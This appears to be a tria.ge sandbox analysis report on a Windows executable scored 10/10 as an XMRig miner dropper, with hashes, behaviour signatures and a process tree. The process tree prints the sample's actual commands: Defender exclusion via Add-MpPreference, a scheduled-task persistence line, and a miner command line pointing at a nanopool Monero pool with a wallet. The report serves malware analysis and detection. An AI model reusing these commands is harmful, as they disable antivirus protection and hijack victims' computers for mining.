Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    65s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/12/2022, 20:48

General

  • Target

    383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe

  • Size

    2.0MB

  • MD5

    7f6bd690058401943b45f8bc8667eec7

  • SHA1

    f8f6f35ba3acdf7e37993b4116c6ef90ee163505

  • SHA256

    383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9

  • SHA512

    455ac13457f9417d2f4ece72cd1ba644ff80ccdbf4454b919d9689a4ae16456637bef963df8b131690ac9e4a0e3dfa1a866bdff29f65aaeebb36a1a413f8b402

  • SSDEEP

    49152:2pFtPeFTefWNTt0dYMuZDGmA8M9JNYPGmT:2pWeulpZa/8+YPGU

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe
    "C:\Users\Admin\AppData\Local\Temp\383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:372
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4288
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4880
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp70FE.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4764
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:3372
      • C:\ProgramData\cloud\GAPOSUR.exe
        "C:\ProgramData\cloud\GAPOSUR.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1912
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1904
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3600
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GAPOSUR" /tr "C:\ProgramData\cloud\GAPOSUR.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:5012
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GAPOSUR" /tr "C:\ProgramData\cloud\GAPOSUR.exe"
            5⤵
            • Creates scheduled task(s)
            PID:2588
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:4960

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\cloud\GAPOSUR.exe

    Filesize

    2.0MB

    MD5

    7f6bd690058401943b45f8bc8667eec7

    SHA1

    f8f6f35ba3acdf7e37993b4116c6ef90ee163505

    SHA256

    383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9

    SHA512

    455ac13457f9417d2f4ece72cd1ba644ff80ccdbf4454b919d9689a4ae16456637bef963df8b131690ac9e4a0e3dfa1a866bdff29f65aaeebb36a1a413f8b402

  • C:\ProgramData\cloud\GAPOSUR.exe

    Filesize

    2.0MB

    MD5

    7f6bd690058401943b45f8bc8667eec7

    SHA1

    f8f6f35ba3acdf7e37993b4116c6ef90ee163505

    SHA256

    383521539e46acf813ec377c5a647406fbb7596456dd6f51ff1d61cf3f42cab9

    SHA512

    455ac13457f9417d2f4ece72cd1ba644ff80ccdbf4454b919d9689a4ae16456637bef963df8b131690ac9e4a0e3dfa1a866bdff29f65aaeebb36a1a413f8b402

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    20eba6f91c7f44dc746743e4e69a4023

    SHA1

    903369b2bdf3c8835dc9fb6b04e31f00e5f6a877

    SHA256

    3a91331e9f82d5b7d6241cc4822658f7a3b583730308dacddad4b2acd5980120

    SHA512

    37e59a1bce7013efd73e56d19a0b168d3d5f07d45ad3dfaf98c6be403ae4bdc8cf05b1b3f157b4e0217302b507dfdb757a1623d316a20a213cf5665f5cf7a87f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    20eba6f91c7f44dc746743e4e69a4023

    SHA1

    903369b2bdf3c8835dc9fb6b04e31f00e5f6a877

    SHA256

    3a91331e9f82d5b7d6241cc4822658f7a3b583730308dacddad4b2acd5980120

    SHA512

    37e59a1bce7013efd73e56d19a0b168d3d5f07d45ad3dfaf98c6be403ae4bdc8cf05b1b3f157b4e0217302b507dfdb757a1623d316a20a213cf5665f5cf7a87f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    cc19bcff372d20459d3651ba8aef50e7

    SHA1

    3c6f1d4cdd647864fb97a16b1aefba67fcee11f7

    SHA256

    366473e774d8976c7fd4dc582220666fb61a4feb3f7c95e69b2a68ad9e446ec9

    SHA512

    a0e360ca4b6e874fd44612bf4b17f3722c0619da4f6bade12a62efadae88c2d33460114eaafa2bc3fb1cef5bea07e745b8bee24f15d0cacaff5f4a521b225080

  • C:\Users\Admin\AppData\Local\Temp\tmp70FE.tmp.bat

    Filesize

    141B

    MD5

    fe55baad0b8ef6b1999cc76e11986eac

    SHA1

    3174960a35bdcf1de5617c6a9ed26008fa5f845d

    SHA256

    4f844a56ed7b53a540310389d7c19004c321d059b29f41310a204c9c3fe7ae97

    SHA512

    472ed9170989e6f3f661b0e9746999a660f87226b8bccd650c88a330818e5270951b1a936df841b46d4136dadc12b71d3c5dcbd3525271a208df9253eeeb6bd8

  • memory/372-139-0x0000000000E00000-0x0000000000E42000-memory.dmp

    Filesize

    264KB

  • memory/372-134-0x00007FFACF000000-0x00007FFACF09E000-memory.dmp

    Filesize

    632KB

  • memory/372-142-0x0000000000080000-0x00000000002DC000-memory.dmp

    Filesize

    2.4MB

  • memory/372-143-0x00007FFAB22C0000-0x00007FFAB2D81000-memory.dmp

    Filesize

    10.8MB

  • memory/372-144-0x00007FFAB3600000-0x00007FFAB374E000-memory.dmp

    Filesize

    1.3MB

  • memory/372-141-0x00007FFAD00F0000-0x00007FFAD011B000-memory.dmp

    Filesize

    172KB

  • memory/372-140-0x00007FFAB22C0000-0x00007FFAB2D81000-memory.dmp

    Filesize

    10.8MB

  • memory/372-135-0x00007FFACC5F0000-0x00007FFACC602000-memory.dmp

    Filesize

    72KB

  • memory/372-148-0x0000000000080000-0x00000000002DC000-memory.dmp

    Filesize

    2.4MB

  • memory/372-149-0x0000000000E00000-0x0000000000E42000-memory.dmp

    Filesize

    264KB

  • memory/372-150-0x00007FFAB22C0000-0x00007FFAB2D81000-memory.dmp

    Filesize

    10.8MB

  • memory/372-138-0x0000000000080000-0x00000000002DC000-memory.dmp

    Filesize

    2.4MB

  • memory/372-137-0x00007FFACF900000-0x00007FFACFAA1000-memory.dmp

    Filesize

    1.6MB

  • memory/372-133-0x00007FFAB3C00000-0x00007FFAB3CAA000-memory.dmp

    Filesize

    680KB

  • memory/372-136-0x00007FFAB3AF0000-0x00007FFAB3BAD000-memory.dmp

    Filesize

    756KB

  • memory/1904-188-0x00007FFAB1F70000-0x00007FFAB2A31000-memory.dmp

    Filesize

    10.8MB

  • memory/1904-185-0x00007FFAB1F70000-0x00007FFAB2A31000-memory.dmp

    Filesize

    10.8MB

  • memory/1912-170-0x00007FFAD00F0000-0x00007FFAD011B000-memory.dmp

    Filesize

    172KB

  • memory/1912-182-0x00007FFAB3600000-0x00007FFAB3635000-memory.dmp

    Filesize

    212KB

  • memory/1912-162-0x00007FFAB3A40000-0x00007FFAB3AEA000-memory.dmp

    Filesize

    680KB

  • memory/1912-163-0x00007FFACF000000-0x00007FFACF09E000-memory.dmp

    Filesize

    632KB

  • memory/1912-164-0x00007FFACC5F0000-0x00007FFACC602000-memory.dmp

    Filesize

    72KB

  • memory/1912-167-0x00000000037C0000-0x0000000003802000-memory.dmp

    Filesize

    264KB

  • memory/1912-166-0x00007FFAB3690000-0x00007FFAB374D000-memory.dmp

    Filesize

    756KB

  • memory/1912-168-0x00007FFACF900000-0x00007FFACFAA1000-memory.dmp

    Filesize

    1.6MB

  • memory/1912-165-0x0000000000CC0000-0x0000000000F1C000-memory.dmp

    Filesize

    2.4MB

  • memory/1912-169-0x00007FFAB1F70000-0x00007FFAB2A31000-memory.dmp

    Filesize

    10.8MB

  • memory/1912-201-0x00007FFAB1F70000-0x00007FFAB2A31000-memory.dmp

    Filesize

    10.8MB

  • memory/1912-171-0x0000000000CC0000-0x0000000000F1C000-memory.dmp

    Filesize

    2.4MB

  • memory/1912-172-0x00007FFAB0820000-0x00007FFAB096E000-memory.dmp

    Filesize

    1.3MB

  • memory/1912-200-0x0000000000CC0000-0x0000000000F1C000-memory.dmp

    Filesize

    2.4MB

  • memory/1912-197-0x00007FFAB1F70000-0x00007FFAB2A31000-memory.dmp

    Filesize

    10.8MB

  • memory/1912-175-0x00007FFAB1F70000-0x00007FFAB2A31000-memory.dmp

    Filesize

    10.8MB

  • memory/1912-195-0x0000000000CC0000-0x0000000000F1C000-memory.dmp

    Filesize

    2.4MB

  • memory/1912-196-0x00000000037C0000-0x0000000003802000-memory.dmp

    Filesize

    264KB

  • memory/1912-186-0x00007FFACDAA0000-0x00007FFACDADB000-memory.dmp

    Filesize

    236KB

  • memory/1912-184-0x00007FFAD0870000-0x00007FFAD08DB000-memory.dmp

    Filesize

    428KB

  • memory/1912-183-0x00007FFAAA5E0000-0x00007FFAAA6E2000-memory.dmp

    Filesize

    1.0MB

  • memory/1912-181-0x00007FFACE8D0000-0x00007FFACE8F7000-memory.dmp

    Filesize

    156KB

  • memory/3600-180-0x00007FFAB1F70000-0x00007FFAB2A31000-memory.dmp

    Filesize

    10.8MB

  • memory/3600-176-0x00007FFAB1F70000-0x00007FFAB2A31000-memory.dmp

    Filesize

    10.8MB

  • memory/4288-157-0x00007FFAB22C0000-0x00007FFAB2D81000-memory.dmp

    Filesize

    10.8MB

  • memory/4288-151-0x000001DBC6440000-0x000001DBC6462000-memory.dmp

    Filesize

    136KB

  • memory/4880-156-0x00007FFAB22C0000-0x00007FFAB2D81000-memory.dmp

    Filesize

    10.8MB

  • memory/4960-194-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/4960-193-0x0000025E16E70000-0x0000025E16E90000-memory.dmp

    Filesize

    128KB

  • memory/4960-192-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/4960-191-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/4960-198-0x0000025EAA8C0000-0x0000025EAA900000-memory.dmp

    Filesize

    256KB

  • memory/4960-199-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/4960-189-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/4960-202-0x0000025E18760000-0x0000025E18780000-memory.dmp

    Filesize

    128KB

  • memory/4960-203-0x0000025EAAF40000-0x0000025EAAF60000-memory.dmp

    Filesize

    128KB

  • memory/4960-204-0x0000025E18760000-0x0000025E18780000-memory.dmp

    Filesize

    128KB

  • memory/4960-205-0x0000025EAAF40000-0x0000025EAAF60000-memory.dmp

    Filesize

    128KB